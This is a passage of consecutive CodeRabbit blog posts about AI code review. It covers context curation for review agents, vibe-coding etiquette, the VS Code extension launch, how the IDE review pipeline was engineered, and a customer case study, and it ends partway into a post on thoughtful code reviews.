* Tool overuse: agents calling everything, just in case ([DevTools Academy](https://www.devtoolsacademy.com/blog/coderabbit-vs-others-ai-code-review-tools/#:~:text=unnecessary%20things%20$there%20were%20cases%20of%20early%20AutoGPT%20agents%20doing%20redundant%20web%20searches$))
* Redundant or noisy fetches that dilute the prompt ([Prompt Engineering Guide](https://www.promptingguide.ai/research/llm-agents#:~:text=overhead%20and%20sometimes%20unpredictability%20if%20the%20agent's%20prompt%20isn't%20tightly%20controlled))
* No clear reward signal to distinguish helpful context from useless output ([ReTool](https://retool-rl.github.io/#:~:text=optimal%20strategies%20for%20leveraging%20external,with%20significantly%20fewer%20training%20steps))

Agent autonomy without structure doesn’t scale.

### **At CodeRabbit, we curate context; we don’t wander**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/973c235f38802f296562123ebf7c9197ad3e7da34c0387d4243c32691ffa43c6_0cb1984763.png)

We’ve taken a different approach. CodeRabbit’s system:

* Runs [30+ static analyzers](https://cloud.google.com/blog/products/ai-machine-learning/how-coderabbit-built-its-ai-code-review-agent-with-google-cloud-run#:~:text=3,20%2B%20linters%20and%20security%20scanners) *before* prompting the model
* Uses **AST and symbol lookups** to identify relevant context
* Applies context filters based on [past review learnings](https://www.anthropic.com/customers/coderabbit#:~:text=CodeRabbit%20leverages%20Claude%20to%20deliver%3A)
* Structures inputs carefully to fit model limits and prompt constraints

This hybrid AI pipeline gives the model exactly what it needs, and nothing more. No random guesses, no runtime surprises.

We’ve learned that great reviews come from:

* Tight, relevant context
* Consistent structure
* Just enough flexibility to adapt to the code change at hand

### **Could agents learn to curate context?**

Maybe, and that’s the interesting future path.
If we had: * A dataset of pull requests with “ideal context sets” * Evaluation metrics tied to actual review outcomes * Synthetic examples showing what helps and what hurts... ...then we might be able to train agents to call tools intelligently. To act more like great reviewers than interns with shell access. That’s the direction explored by recent work like [ReTool](https://retool-rl.github.io/#:~:text=optimal%20strategies%20for%20leveraging%20external,with%20significantly%20fewer%20training%20steps) and [LeReT](https://arxiv.org/abs/2410.23214#:~:text=topics,Project%20website%3A%20this%20http%20URL), which use reinforcement learning to teach agents retrieval strategies — learning which tools to invoke and when, based on feedback loops tied to downstream task quality. ReTool showed improvements in task accuracy of up to 9% over retrieval-agnostic baselines, and required significantly fewer training steps to converge. LeReT similarly demonstrated a 29% boost in retrieval success and a 17% gain in downstream QA accuracy over standard retrievers — strong early signals that agents can, in fact, learn to fetch the right context when properly trained. But even with these improvements, we’re still lacking high-quality, domain-specific datasets for tasks like code review. One path forward could involve curating a large-scale benchmark of real and synthetic pull requests, each labeled with: * The issue or defect type present (e.g. logic bug, perf regression, missing test) * The AI context types that improve or degrade LLM performance on detecting that issue (e.g. 
AST, file diff, related function definitions, ticket description) * The tool invocations used (or simulated) to assemble that context With this dataset, we could: * Evaluate which types of PRs benefit from which types of context * Train agents to learn context selection policies based on PR characteristics * Create specialized sub-agents for different error classes (security, style, performance), each using context proven to enhance detection of those issues In other words: teach agents to reason more like experts — not just by copying what they say, but by emulating how they gather, filter, and apply the information that matters. And we wouldn't have to guess at it. We could back it up with data. That’s the deeper opportunity: not just training agents to run tools, but to understand **why** and **when** to use them — grounded in evidence, driven by outcomes. We’re not there yet. But the path is starting to look clearer. And at CodeRabbit, we’re leading the charge. This is exactly the frontier we’re investing in: building hybrid AI systems that can predict the right tool to use, at the right time, for the right kind of review. Not just to make something clever — but to make something teams can trust. ## **Our hybrid AI pipeline: We reason with purpose** By now, it should be clear that "agentic AI vs. pipeline AI" isn’t the real battle. These are just architectural tools — different shapes we use to tackle the same core problem: *How do we give the model exactly what it needs to deliver a useful review — and nothing that drags it off course?* Pipeline AI systems give us speed, control, and consistency. Agentic AI systems promise adaptability and richer reasoning. And hybrid AI systems, like what we’ve built at CodeRabbit, try to walk that line — combining structure with flexibility, precision with power. But no matter how you structure it, one thing matters above all: **context**. The hard part of code review — for both humans and machines — isn’t the format. 
It’s knowing where to look. What matters. What can be ignored. What’s risky. What’s surprising. That’s what great engineers learn to spot, and it’s what we’re trying to teach our models to do.

That’s the exciting part. Because if we can train a system to not just analyze a diff, but to **know which tool to call, when to call it, and how to interpret its output with surgical precision**, then we’re getting closer to something remarkable. Not just automation. But **reviews that feel like they came from your best engineer**, on their best day, every time.

That’s what we’re building toward. Not for the sake of cleverness, but because that’s what teams need: trustworthy tools that help them move fast, write better code, and ship with confidence. We’re not done. But we’re getting closer.

***Interested in trying out CodeRabbit’s reviews?*** [***Get a 14-day trial!***](https://coderabbit.link/yzOslzy)

How to vibe code at work without your colleagues hating you

Emily Lint — Mon, 26 May 2025 00:00:00 GMT

It seems like [vibe coding is everywhere](https://fortune.com/2025/03/26/silicon-valley-ceo-says-vibe-coding-lets-10-engineers-do-the-work-of-100-heres-how-to-use-it/) these days. It’s become the latest developer trend, fueled by Twitter threads about people vibe-coding entire startups in a weekend. It can be fun to vibe code your hobby projects, and you might feel tempted to bring that chaotic, spontaneous AI-powered energy into the workplace. Be warned: your teammates probably won’t share your enthusiasm when they're forced to review massive, confusing, and buggy code dumps.

To illustrate this problem for all those tempted to ‘vibe’ at work, we created a comic. *The Vibes Are Off* features Zig, the office vibe coder, submitting an enormous PR to his beleaguered colleague, Grumpster. Poor Grumpster spends two soul-crushing days cleaning it up, only for the CTO to publicly praise Zig for saving a few hours coding. Grumpster? Well, he’s left quietly dying inside.

**Read it here:** [https://victorious-bubble-f69a016683.media.strapiapp.com/Harecompressed\_910f61fa09.pdf](https://victorious-bubble-f69a016683.media.strapiapp.com/Harecompressed_910f61fa09.pdf)

At CodeRabbit, we don’t think that code reviews should cause anyone to begin a decades-long quest for vengeance. That’s why we’re launching a **Code Review Etiquette** series. Our first order of business? Prevent vibe coders from becoming the most hated developers at their companies.

## **Edit your code, don't just vibe & pull request**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/37562852f401b3e52f70e4cb3d1c15f5a7e9dd81650ab94502a7cd26eb37ed5d_738af320d1.png)

Look, we get it. It feels amazing to watch your AI coding assistant spit out an entire app from a vaguely worded prompt. But we beg you: don’t commit it straight into your PR.
AI-generated code is notoriously verbose and loves sprinkling in little surprises like pointless loops or imaginary functions that don’t exist in your libraries. Take the time to actually read the AI’s output before passing the pain onto your teammates. And once you’re done? Read it again. And then read it *yet another* time. Refactor awkward functions, clean out those random bits of nonsense, and check whether your assistant hallucinated APIs (it happens more than you think!). In other words, do the minimum required to ensure that your colleagues won't wish you ill. This way, your colleagues won’t dread seeing your PR pop up – and you might just avoid becoming the reason they DM each other vibe coding memes. ## **Avoid *ginormous* PRs** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4d02a826b54bfa0961f80ad3cc22aa87224f8ab1eb9553b39c303c88b33aa2b9_4017fa8567.png) Nothing sparks immediate workplace rage like a PR that reads “+11,374, -3.” If your AI assistant just handed you a PR that could rival the length of *War and Peace*, you've officially violated every known rule of code review etiquette. The developer equivalent of [Emily Post](https://en.wikipedia.org/wiki/Emily_Post) is now *very* mad at you. Massive PRs aren’t just annoying—they guarantee that reviewers will miss important issues and send bugs into production. Instead, split your vibe-coded masterpiece into smaller, digestible pieces. You know, like you’d want to receive it. Even if the AI assistant gave you the entire feature in one go, be kind and break it into logical chunks before subjecting your colleagues to a review so endless that it will leave them feeling like they’re in a Black Mirror episode where time has somehow looped. 
Trust us, your teammates will appreciate the effort and you’ll spare yourself some passive-aggressive comments or an immediate ‘Request Changes.’ ## **Ensure your code meets org style and standards** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c652468e5f238af14fcc5e3ef101c40b37e3b56b326146a2520a18bd392f7646_3c17d29a93.png) Your organization’s style guide and coding standards aren’t just ‘suggestions.’ Just because the AI you vibe-coded with decided camelCase and snake\_case look beautiful together doesn’t mean your colleagues agree. Leaving style issues for your reviewers to clean up is a sure way to build resentment faster than npm builds node\_modules. Make sure your vibe-generated code matches the established style. Yes, it might be boring. Yes, it takes slightly more time. But remember, your colleagues didn’t sign up to debug your assistant’s latest avant-garde variable naming schemes. ## **Get AI to review in your IDE** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f6f7ed9b59e5412c50cb4222cf49769099503c6387d9e6b9933ad2c9e83d82bb_4f94df54bb.png) If you insist on vibe coding, then at least have the decency to enlist an AI assistant to do the heavy lifting of cleaning up your code first. At CodeRabbit, we now offer [AI-driven reviews right inside your IDE](https://coderabbit.link/nTSFnhG) (and for free too!). It will catch embarrassing bugs, obvious mistakes, and nonsensical logic that you might miss. And all before a human reviewer even sees it and adjusts their opinion of you down a few notches. Running these preliminary reviews shows respect for your teammates’ time. It’s the ultimate act of empathy: a robot criticizing you now so your colleagues won’t have to later. And if you just really enjoy passive aggressive comments from annoyed developers for some reason, don’t worry! 
You can [customize CodeRabbit’s tone](https://x.com/coderabbitai/status/1925196149616529882) to add comments in the same frustrated tone your teammates would! ## **Warn your colleagues (& thank them after)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/bb24d2c9a66e8561644f1ac9ef0482ed27543e0a75698d84c5bc50e69c9934b9_1958dced19.png) If you’re going to unleash AI-generated code into your teammates’ lives – you might want to at least warn them in advance. A quick Slack message saying something like, “Heads up, vibe-coded PR incoming!” lets your team brace themselves mentally (or emotionally). You can even add a few sheepish emojis. We suggest these: 🫣🫠😳. Even better, acknowledge upfront that your PR might contain more WTFs than usual. After your colleagues spend hours untangling your AI’s bizarre logic (or less time if they *also* enlist an AI reviewer like CodeRabbit to do a first pass), don’t forget to thank them – even if it’s just in grateful replies to their frustrated comments. Gratitude goes a long way toward smoothing over any vibe-induced frustration. ## **Code review best practices: Vibe responsibly!** Vibe coding is here to stay – at least as long as AI tools keep getting smarter and developers keep writing multi-part threads on social media. While there’s nothing wrong with experimenting and having fun, your teammates shouldn’t have to suffer for your AI-assisted sins. If you follow these basic etiquette rules – editing and reviewing before committing, respecting your company’s standards, and warning people before you drop an AI-fueled PR bomb—you might just avoid becoming the most hated dev at your company. Plus, you’ll actually end up producing better code! Or you could ignore all this advice, keep vibe coding recklessly, and earn yourself a starring role in your office’s most pointed private jokes. But don’t say we didn’t warn you. 
*Want to sign up for* ***free*** *code reviews in VS Code, Cursor, or Windsurf?* [*Go here!*](https://coderabbit.link/nTSFnhG)

CodeRabbit for VS Code Is Here — Free AI Code Reviews

Sahil Mohan Bansal — Wed, 14 May 2025 00:00:00 GMT

We’ve got exciting news to share! CodeRabbit’s AI code reviews are now delivered [directly within VS Code](https://coderabbit.ai/ide) and its forks, including Cursor and Windsurf. And **code reviews in the IDE are completely free**! With this extension, we focused on building the best quality reviews in the IDE so that we can identify more bugs and issues for you than existing review tools. This brings CodeRabbit directly into your development workflow – making it much easier to incorporate our review feedback in your code. To get started, simply install the CodeRabbit plugin in any VS Code fork. We will then review every commit, identify most bugs before the PR is raised, and help you ship code faster. [![AI code reviews in IDE](https://victorious-bubble-f69a016683.media.strapiapp.com/548bef71413aef8793ca799c76470c3792a798049204a8e40676e0c1128f84d5_a170894cd7.png)](https://coderabbit.ai/ide) *Free AI code reviews in VS Code, Cursor and Windsurf* At CodeRabbit, we believe that the best tools fit seamlessly into your existing workflows. With our AI code reviews coming into Cursor and Windsurf, developers can now get code reviews done without breaking their flow state. ### Benefits of AI code reviews in IDE Code reviews in the IDE are a great way to: * Automate the first pass of code review right as you’re coding. * Quickly catch and fix any issues right in your IDE. * Reduce back-and-forth at the PR stage, helping you ship faster. * Help you raise pull requests with greater confidence – and fewer bugs. This multi-layered approach – with reviews in both the IDE and the Git platform – helps developers catch more bugs and reduce review time. Ultimately, code reviews are necessary in both places and deliver complementary benefits. With reviews in the IDE, developers get a first pass review right as they are coding.
With reviews in the Git platform, the entire team’s code is reviewed in a centralized manner, making it easier to catch issues that may creep in when all the commits come together. This helps individual developers get faster feedback in their code editor – while also maintaining a centralized governance structure across the team. [![Code reviews in IDE and in PR](https://victorious-bubble-f69a016683.media.strapiapp.com/192d756029a510cd18d884237948dc601cf3b3b176ef339e50262bb56f5150d3_e981240559.png)](https://coderabbit.ai/ide) *Code Reviews in the IDE and in the PR* ### Vibe code with confidence One of the key challenges we hear from developers is how AI coding agents can leave defects behind that are hard to catch. These AI code gen tools are not always able to catch defects in the code they generated. This is why having a second, independent set of eyes is critical to ensure that bugs are caught before they end up in production. Here’s how CodeRabbit works in the IDE: 1. **Inline code reviews:** Each line of code gets senior developer level attention with AI-powered inline review comments. CodeRabbit becomes your pair programmer, within the code editor. [![Line by line code reviews in VS Code](https://victorious-bubble-f69a016683.media.strapiapp.com/79aedb23b2af56736a4cf96448c79c83ed2d5bce7cb0a13903e214277840307f_98e35d30ef.png)](http://coderabbit.ai/ide) 2. **Built for flow, not friction:** Code, review, commit - without breaking your flow state. CodeRabbit reviews every committed and uncommitted change, making your dev workflow faster. [![review committed and uncommitted changes](https://victorious-bubble-f69a016683.media.strapiapp.com/e5e018dccfa9eccafa4c56249021d0f25b060f9c5ea5ca1d23fc9824f2ddfc2b_d1cef66da9.png)](https://coderabbit.ai/ide) 3. **Fix-with AI:** Some review suggestions are simple and can be incorporated by using “One-Click Fix” to apply changes instantly. 
For more complex feedback, our “Fix with AI” feature hands off CodeRabbit’s review comments with associated context to your preferred AI coding agent. [![Fix with AI](https://victorious-bubble-f69a016683.media.strapiapp.com/7a5a9835760693a8ebcfb012065827fa566c005299738011396884a3bdd995fd_b5ffb6ab7c.png)](https://coderabbit.ai/ide) 4. **Fork-compatible and language agnostic:** Our VS Code plugin supports all VS Code forks including Cursor and Windsurf. All commonly used languages are also supported, such as Java, JavaScript, PHP, Python, TypeScript, Go, Ruby and many more. ### IDE reviews are a lightweight, faster version of our PR reviews Our free reviews in the IDE are done by a lightweight version of CodeRabbit that delivers feedback instantly and catches most bugs. For production use-cases, we recommend using the full version of CodeRabbit that also reviews code in the PR, in addition to reviews in the IDE, and comes with additional features, including additional context from several sources during the review process. Check out the technical details of how we adapted our PR reviewer for [instant reviews in the IDE](https://www.coderabbit.ai/blog/how-we-built-our-ai-code-review-tool-for-ides). Note that the rate limits for reviews in the IDE will be lower than the rate limits for reviews in the PR. For a detailed feature comparison of what is included with reviews in the IDE vs reviews in the PR, [refer to our documentation](https://docs.coderabbit.ai/code-editors). ### Next Steps Try out CodeRabbit’s free AI code reviews in VS Code, Cursor or Windsurf. We’d love to hear your feedback. Setup takes just a few minutes. Here are some additional resources to help get started: * [Install the VS Code plugin](https://marketplace.visualstudio.com/items?itemName=CodeRabbit.coderabbit-vscode) * [Watch demo video](https://coderabbit.link/vscode-demo) * [Share feedback on Discord](https://discord.gg/coderabbit) * [Contact Sales for higher rate limits](https://www.coderabbit.ai/contact-us/sales)

How we built our AI code review agent for IDEs

Amitosh Swain — Wed, 14 May 2025 00:00:00 GMT

At CodeRabbit, we recently shipped our [free VS Code extension](https://coderabbit.link/rxv5kZ8), bringing context-rich AI-powered code reviews directly into your editor. Our engineering philosophy has always been simple: we build tools that fit seamlessly into your existing workflow. While developers have told us our [comprehensive PR reviews](https://docs.coderabbit.ai/) have helped them ship faster and keep more bugs from production, many also asked for [IDE reviews](https://coderabbit.link/ozj7K45) to help check code prior to sending a pull request. By creating another review stage within VS Code (and compatible editors like Cursor and Windsurf), we've minimized disruptive context switching, allowing developers to catch logical errors and embarrassing typos before they ever send a PR. In our dogfooding, our team has found it helps catch issues early and reduces the iterative back-and-forth that can slow down teams at the pull request stage. One engineering challenge we faced when designing IDE reviews was re-engineering our code review pipeline to meet developers’ expectations for instant reviews in their IDE. In this post, we’ll share how we thought through this shift and what steps we took to ensure high-quality reviews while reducing the time-to-first comment by ~90%. ## Transforming CodeRabbit’s typical code review pipeline ![Architectural diagram for CodeRabbit's PR reviews](https://victorious-bubble-f69a016683.media.strapiapp.com/534744cceae3f36b5051ce068d5574fa7687e28646fa705fab1baf995033e18e_15791e0be8.png) Because CodeRabbit initiates a review immediately after a PR is sent, we optimized our PR code review process for the most helpful reviews and send a notification to the reviewer when our review is completed. That process takes several minutes and involves a complex, non-linear pipeline that pulls in dozens of contextual datapoints for the most codebase-aware reviews. 
![](https://victorious-bubble-f69a016683.media.strapiapp.com/04d9848d9c9b2c9200c6dbb07a6fa581f76063f4a9a627f27980ad6432f8eead_4459d44ec2.png) We then subject all recommendations to a multi-step verification process to validate that each suggestion will actually be helpful in order to ensure our reviews have as little noise as possible. This involves multiple passes where we identify how parts of the codebase and changes fit together to look for issues before also processing and verifying each suggestion separately. During this process, we don’t share any of those suggestions with the user but wait until we’ve completed all steps in the pipeline in case we find that a suggestion might not be useful. This approach creates a sophisticated, non-linear review graph that is batch delivered to minimize noise. However, users receiving a PR are unlikely to act on it immediately so the processing time isn’t noticed. In that case, it makes sense to bias for quality over speed. But it’s different with IDE reviews. In the IDE, the user expects that reviews will start instantly and be delivered quickly since they might be waiting for the review before sending a merge request. They want to start working on changes immediately. To create an IDE review that better fit user expectations, we needed to adjust how we approached reviews for that context – without impacting review quality or usefulness. ## Balancing quality and speed ![](https://victorious-bubble-f69a016683.media.strapiapp.com/70b001e3d8fb10ec4af38e6702b4c2af17567ba0741f47abd5a8f40e685514eb_ac4159d67a.png) Developing a streamlined pipeline able to deliver near real-time feedback directly within your coding environment required that we restructure how events and review comments were both created and transmitted. This process started by thinking intentionally about the affordances around creating valuable insights in real-time. 
Real-time reviews would make it impossible for every comment to go through our verification steps to ensure its relevance. But removing those steps from our pipeline would lead to noisier reviews and a higher proportion of unhelpful suggestions. At what point would the signal-to-noise ratio make an AI code review more of a nuisance than a help? Since we also offered a solution at the PR stage, we could make our IDE reviews narrowly focused on what mattered most at that stage. We decided that anything that was architectural or required deeper verification with the full codebase was better suited for the PR stage since trying to deliver valuable insights around that would require multi-step validation and take too long. In our PR reviews, we even go so far as to check code by attempting to run it in our sandbox. But that would be impossible in real time. We decided instead to prioritize reviewing for mistakes, specification alignment, bugs, and logical issues that a developer might miss while coding or editing. Since those are the kinds of things that could require a PR be sent back for changes or make your colleagues question *how you could have missed it*, we saw these as the most critical issues to look for in the IDE. For example, in my own use of our IDE reviewer, it found a conditional that I changed by mistake and didn’t notice. We also still wanted to have a verification process that would validate that any suggestions we made would be beneficial but needed to build a more lightweight process for doing so. Our goal was to develop the best IDE reviews but we knew they didn’t need to be as comprehensive as our PR reviews. The goal of IDE reviews is to streamline the PR process with an IDE check to help devs tackle the most critical changes and merge more confidently, at which point the code would undergo our more in-depth PR review.
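As a rough illustration of the split described above, findings could be routed by category: the kinds of issues prioritized for the IDE are handled there, and everything else waits for the PR review. The category names and the `review_stage` helper below are hypothetical, chosen only for this sketch; the post doesn't describe how CodeRabbit actually makes this decision.

```python
from enum import Enum


class Stage(Enum):
    IDE = "ide"
    PR = "pr"


# Hypothetical category labels, loosely following the priorities named in the
# text: mistakes, specification alignment, bugs, and logical issues.
IDE_CATEGORIES = {"mistake", "spec_alignment", "bug", "logic"}


def review_stage(category: str) -> Stage:
    """Return the stage where a finding of this category would be raised.

    Anything not explicitly prioritized for the IDE (for example architectural
    concerns that need the full codebase) is deferred to the PR review.
    """
    return Stage.IDE if category in IDE_CATEGORIES else Stage.PR


if __name__ == "__main__":
    for category in ("bug", "architecture", "logic"):
        print(category, "->", review_stage(category).value)
```

Defaulting unknown categories to the PR stage keeps the IDE pass narrow, which matches the stated aim of leaving deeper verification to the slower pipeline.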
## How we engineered it ![](https://victorious-bubble-f69a016683.media.strapiapp.com/85a02749809bfc8602dd73c73c8ac4abb8a8f93d74d7e28da412a554ca43db4b_ef9d424ae0.png) Here’s how we tackled developing a new pipeline for our IDE reviews. ### Review processing and delivery One of the biggest changes we made was to how we process and deliver reviews. While in the SCM, we process all suggestions together and wait until we’ve completed our review before delivering the results to users, in the IDE we opted to deliver suggestions iteratively in real-time as our pipeline created them. While we could have opted for a more superficial review and delivered the complete results faster, we wanted to balance comprehensiveness and quality with the user’s need for instant feedback. By sharing suggestions over a longer period of elapsed time, we were able to buy extra time to include additional steps in the process to improve the quality of the suggestions. Because we opted to engineer our system in this way, that also meant that CodeRabbit was able to give continuous feedback as you code using the same review process and pipeline. ### Context preparation ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a62dc20fe4b6de15507a0bcf0e7a30822ac999c04b2a59db4e3509ef44841562_3b65f1e7d8.png) Context enrichment is a big part of how we deliver the most codebase aware and relevant recommendations. However, our context preparation process is extremely comprehensive for our PR reviews. We go so far as bringing in linked and [past issues](https://docs.coderabbit.ai/guides/linked-issues), cloning the repository, and even building a [Code Graph](https://docs.coderabbit.ai/integrations/code-graph-analysis/) of your codebase to analyze dependencies. That kind of context enrichment wasn’t possible in the IDE. Instead, we focused on the code primarily to keep the context lighter for a faster review. 
In the future, we are also planning on adding user-specific Learnings similar to how we do [org-level Learnings](https://www.youtube.com/watch?v=Yu0cmmOYA-U) for teams. That will ensure that code reviews will improve in relevance over time as the agent learns from your past commits and feedback. ### Prompt and model optimization Despite rearchitecting our pipeline to be more linear and to cut down on steps, we didn’t alter the multi-model orchestration that we use for our PR reviews. We use the same orchestration of models for both kinds of reviews but apply different weights when selecting which models process different parts of the review. We also fine-tuned how our decisioning engine worked to create a more linear process flow. Finally, we optimized our prompts for faster response times and the different priorities we’d identified for IDE reviews. ### Choosing non-streaming LLM responses over streaming responses We first thought streaming responses (generating words one by one from a language model, as in ChatGPT) would be ideal for our IDE reviews, especially since streaming is popular for real-time tasks. But because our prompts are large and we perform significant context engineering before starting our reviews, we ran into problems like garbled output from the model and missing tool calls. Users expect review comments to be complete, unlike casual chats with AI coding assistants. So, we have to clean up the model’s output before showing it. Since streaming delivers the model’s output in chunks, we had to buffer the LLM output until the model generated a full comment before sending it through our processing pipeline. This delay meant streaming didn’t help much in our case. Instead, we chose to wait a bit longer to get complete outputs for a batch of files simultaneously.
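The buffering step described above can be sketched roughly as follows. This is a minimal illustration, not CodeRabbit's implementation: the `complete_comments` function and the `---` delimiter between comments are assumptions made for the example.

```python
from typing import Iterable, Iterator

# Hypothetical marker that separates one review comment from the next in the
# model output. The real output format is not described in the post.
COMMENT_END = "\n---\n"


def complete_comments(chunks: Iterable[str], delimiter: str = COMMENT_END) -> Iterator[str]:
    """Yield only complete comments from a stream of arbitrary text chunks."""
    buffer = ""
    for chunk in chunks:
        buffer += chunk
        # A single chunk may finish zero, one, or several comments.
        while delimiter in buffer:
            comment, buffer = buffer.split(delimiter, 1)
            if comment.strip():
                yield comment.strip()
    # Whatever is left when the stream ends is treated as the last comment.
    if buffer.strip():
        yield buffer.strip()


if __name__ == "__main__":
    # Chunk boundaries fall mid-word and mid-delimiter, as they can in a stream.
    streamed = ["Possible off-by", "-one in loop.\n--", "-\nUnused variable `tmp`.", "\n---\n"]
    for comment in complete_comments(streamed):
        print(comment)
```

Because nothing is emitted until a delimiter arrives, the consumer sees a comment no earlier than it would with a non-streaming call for that comment, which is the reason the post gives for streaming offering little benefit here.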
### UI changes ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d4b934f4725ddc64ed6b7d342e69460744d25131a9da4bd528dd3c1f84643192_02bbe29f1b.png) We had to design our UI from the ground up in VS Code. At first, we thought of adding our own comments panel where we would add comments similar to how we do it in SCMs. But we realized that a comments panel wasn’t the right way to do real-time comments. We decided to integrate our comments more directly into the editor so that users get the comment where the code is. We find this is a more IDE-native strategy and creates a better UX flow. ### Working with users’ preferred AI coding agents Because so many developers use AI coding tools in their IDE, we wanted to take advantage of that to give devs choice around how to resolve a suggestion from CodeRabbit. We give users the option to resolve the issue with code we suggest or to pass over the suggestion to the users’ preferred AI coding assistant to suggest code. All in one click. ## What’s next on the roadmap? ![](https://victorious-bubble-f69a016683.media.strapiapp.com/76e1c8c06b7502211715677a92044688a09d35e710016f7657ab63d0b87f22b5_1cae44da03.png) We might have launched version 1.0 of our IDE reviews but we have a number of things in our roadmap to make them even more helpful. ### Near term * **User-level Learnings:** We’ll be adding the ability to add [Learnings](https://www.youtube.com/watch?v=Yu0cmmOYA-U) or give feedback on suggestions so our agent automatically learns the suggestions you like and don’t like. We currently have [org-wide Learnings](https://www.youtube.com/watch?v=Yu0cmmOYA-U) in the SCM but want to extend this feature to individual developers who want to add custom Learnings that will only apply to them. * **Tools:** We’re planning on bringing the [30+ tools](https://docs.coderabbit.ai/tools/) you can use in our PR reviews to our IDE reviews. 
If you’re already running linters in your IDE, you’ll be able to do it all in one review with CodeRabbit. Look out for this addition later in the year. ### Longer-term * **Web Queries:** We plan to integrate our context-enhancing features into our IDE tool so your code is bug-free with fewer false positives and your reviews are always up to date on versions, library documentation, and vulnerabilities, even if the LLM isn’t. * **Docstrings:** Want to create [Docstrings](https://docs.coderabbit.ai/finishing-touches/docstrings) before you merge? We’ll be adding this feature that’s currently part of our PR reviews to our IDE reviews in the future. * **More codebase awareness:** We will be bringing in additional data points to create more codebase-aware reviews in the IDE. ***Try our free*** [***IDE reviews here***](https://coderabbit.link/rxv5kZ8)***. Interested in tackling similar challenges?*** [***Join our team.***](https://coderabbit.link/ecTThbN)

How KeyValue Software Systems Leveraged AI to Accelerate Code Reviews

Manpreet Kaur — Wed, 05 Mar 2025 00:00:00 GMT

**At a Glance:** **Primary contact:** [Shanimol. E.M, Engineering Manager](https://www.linkedin.com/in/shanimol-e-m-3b596955/) **Company:** [KeyValue Software Systems](https://www.keyvalue.systems/) **Coding languages used:** Golang, Flutter, Next.js, React, Python **Challenge:** Time-consuming, inconsistent, and error-prone manual code reviews slow development. **Key Result:** Code review time reduced by more than 50%, enabling faster releases and improved efficiency. [KeyValue Software Systems](https://www.keyvalue.systems/) is a premier global AI-first product development hub and the best delivery engine in the Indian subcontinent. With a 400+ strong engineering team, the company has built and delivered 120+ products for 80+ companies over the last eight years. Its expertise spans industries, geographies, and technologies, leveraging AI to create high-value software solutions. At KeyValue, Shani leads a 20-member engineering team developing a fintech product to help tech startup operators, founders, and investors create and manage wealth. The team focuses on delivering a secure, fast, and reliable user experience. ### **Business Challenges – Manual Code Reviews Slowing Down Development** As a product development partner for fast-moving startups and scaleups, KeyValue Software Systems prioritizes **rapid feature releases**. However, manual code reviews have created bottlenecks in the development process. **Key Challenges:** **Time-consuming Manual Reviews**: Engineers spent excessive time reviewing PRs, creating bottlenecks that slowed QA delivery and reduced overall productivity. **Inconsistent Review Quality**: Varying skill levels led to overlooked best practices and inconsistent naming conventions. 
**Security Risks in FinTech**: Given the security-sensitive nature of FinTech applications, ensuring strong security, compliance, and vulnerability detection before deployment was critical. **Engineering Bandwidth Constraints**: Senior developers spend too much time reviewing code instead of focusing on high-impact development and architectural improvements. **Missed Bugs & Hidden Errors**: Manual reviews often miss subtle bugs, ambiguous code, and performance inefficiencies, leading to potential unexpected behavior. **Sprint Execution Inefficiencies**: Teams spend excessive time in the push-review-fix-release loop, limiting their ability to focus on strategic, high-impact engineering challenges. ### **Key CodeRabbit Features That Transformed Development Workflow:** **1\. Always-ON AI Code Reviews:** * CodeRabbit functions like a 24/7 senior engineer, ensuring prompt and consistent code reviews without relying on peer availability. **2\. Automated PR Summaries and Suggestions:** * Clear and concise summaries for every PR, making it easier for reviewers to understand changes at a glance. * Intelligent refactoring suggestions ensure optimized, maintainable code. * Detects edge cases and recommends error-handling improvements, identifying potential issues early. **3\. Security:** * Automatically flags security risks and helps meet security compliance requirements. **4\. Bug Detection:** * AI-driven bug identification highlights potential issues in the code before they go live. * Automated error-handling reviews improved overall application stability. **5\. Context-Aware Code Reviews with Linear Integration:** * Seamless integration with Linear allows CodeRabbit to fetch relevant ticket details, providing context-aware PR reviews. * Leverages ticket descriptions to ensure code changes align with business requirements and intended functionality. **6\. Junior Engineer Onboarding:** * AI highlighted naming conventions and coding standards and reinforced best practices. 
* Reduced senior engineers' having to correct common beginner mistakes. **7\. Increased Sprint Productivity:** * Time saved in code reviews was used to take on strategically important tasks. * More efficient sprint execution due to less time in review cycles. **8\. Built-In AI Chatbot for Interactive PR Discussions:** * CodeRabbit’s intelligent chatbot allows engineers to interact with PR comments in real time, making it easier to clarify suggestions, request refinements, and resolve issues efficiently. * It simplifies code review discussions by providing quick explanations and justifications for AI-generated review comments. “CodeRabbit has completely transformed our code review process, making it faster, more consistent, and less manual. It has saved us more than 50% of the time we used to spend on manual reviews, allowing our engineers to focus on building great products” - [Shanimol. E.M](https://www.linkedin.com/in/shanimol-e-m-3b596955/), Engineering Manager, [KeyValue Software Systems](https://www.keyvalue.systems/) ### **Conclusion** CodeRabbit has improved the way KeyValue teams work. By automating code reviews, CodeRabbit enabled engineers to deliver high-quality products faster while maintaining security and best practices. With CodeRabbit rolling out to more teams within the company, KeyValue is using AI to set a new standard for development efficiency. **Get Started with CodeRabbit** If your team wants to supercharge its development workflow, CodeRabbit makes AI-powered code reviews seamless and efficient. You can try CodeRabbit in under 5 minutes; no credit card is required. Get started today.

How to Do Thoughtful Code Reviews

Ankur Tyagi — Mon, 03 Mar 2025 00:00:00 GMT

Good code reviews take thoughtful, unambiguous communication. This can be a big challenge as a team grows. Each new developer adds lines of communication. This is why well-documented code review guidelines, processes, and principles are so important. ![More developers, more lines of communication.](https://victorious-bubble-f69a016683.media.strapiapp.com/9cf99cf84e6474c19a202356af44b3f423bb94e2df8528a1516db83a21235ae4_fd54b44ca0.jpg) Code review is a critical step in the software development lifecycle that you shouldn't omit. However, how code review should be done has been debated for a long time. > Every organization approaches code reviews in their own way. In some organizations, everyone reviews the code. Others prefer to assign code review to one team member (usually a more senior engineer than the author). Big tech companies usually have an internal code review tool to manage the entire process. Google has Critique & Gerrit, and Meta has Phabricator. Also, since Generative AI and AI Code Assistants became very popular, many organizations have adopted them to automate code reviews. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2a4eb767af6dead75642989134233009ea9e1d89279227b4318f73a3914fba03_3e6b3e4ed0.png) Just as organizations approach code review in their own way, software engineers also have opinions on how they want code review done. These opinions might differ from their 